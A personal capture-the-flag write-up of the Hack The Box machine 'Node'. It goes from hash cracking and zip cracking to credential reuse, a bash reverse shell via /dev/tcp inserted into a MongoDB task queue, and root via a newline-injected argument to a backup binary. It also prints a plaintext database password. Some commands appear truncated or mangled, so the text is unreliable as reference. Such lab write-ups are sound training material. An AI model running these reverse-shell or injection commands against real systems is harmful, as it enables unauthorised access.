This is my write-up for the machine on Hack The Box called Node located at:

I started off with an nmap scan:

We see 2 ports open: one for SSH and one for a software known as hadoop-datanode. Port 3000 has a web server running on it:

I then ran dirsearch using the directory-list-lowercase-2.3-medium.txt from the dirbuster wordlist directory to see what folders/files I had access to:

dirsearch -e php,html,js,cgi,bak,txt -u -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50

This showed me the following:

I read up on this write-up which pointed me in the direction of using burpsuite in order to see requests incoming. I found one that was interesting and followed it:

These could be passwords or hashes. I tried the username with the passwords, and this did not work for me. Running the hash for tom in hash-identifier resulted in the following:

Running the other hashes resulted in SHA-256 as well. Using the hashcat examples website, I then had to find out what the Hash-Mode was:

Running the hashcat command hashcat -a 0 -m 1400 hashes rockyou.txt got me the following:

It seems that I have cracked the passwords for the users tom and mark. When I login using those credentials, I get the same result:

Reading the same write-up from before, I missed the directory above from where I was located at:

This led me to find a new user: myP14ceAdm1nAcc0uNT. I then ran hashcat on the new hash (with a new wordlist - not needed, but I just did) and got the following:

Now we see a different output on the main screen:

Downloading the backup led me to a large ASCII file:

I noticed a "=" at the end, so I thought it could be base64. Decoding the file led me to a zip folder where the files were password protected:

Following the write-up mentioned above, I ran the command cat myplace.backup | base64 -d > in order to make my own zip file. This gave me the same result that I had gotten earlier from using to decode the content of the document for me. I then uploaded zipped file on this website and got the following output:

I will go back to the example hashes site from hashcat to see what mode this would be:

I then ran the hashcat command hashcat -a 0 -m 17230 pkziphash xato-net-10-million-passwords-1000000.txt to see if I can crack the password:

I was then able to decode the zip by running unzip This created a new directory called var in my local directory. In a file called app.js, I found the following:

I was a bit lost about what to do with these credentials, I then read the same write-up again to find out that those credentials would work for SSH:

I also learned from the write-up to search for processes being run by tom:

I do not have a lot of experience with mongo commands work. Between the write-up I have been mentioning previously and this write-up for this machine, I ran the following commands:

mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k

db.tasks.insert({cmd: '/bin/bash -c "/bin/bash -i >& /dev/tcp/ 0>&1"'})

I was then able to get a shell as tom:

I was then able to read the user.txt:

From the second write-up (previously mentioned), I learned about the following command, which got me directly to root using the backup process:

/usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 $'\n /bin/bash \n' <4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 $'\n /bin/bash \n'

I will be honest. I have been looking at write-ups for this machine and they all seem to use buffer overflows in order to crack the command to get to the root user. I am a bit unsure how the previous command I used to get to root worked. From my understanding, it seems that the backup process was owned by root, and using the backup key, I was able to run the command. Again, not why why this command exactly.

Last updated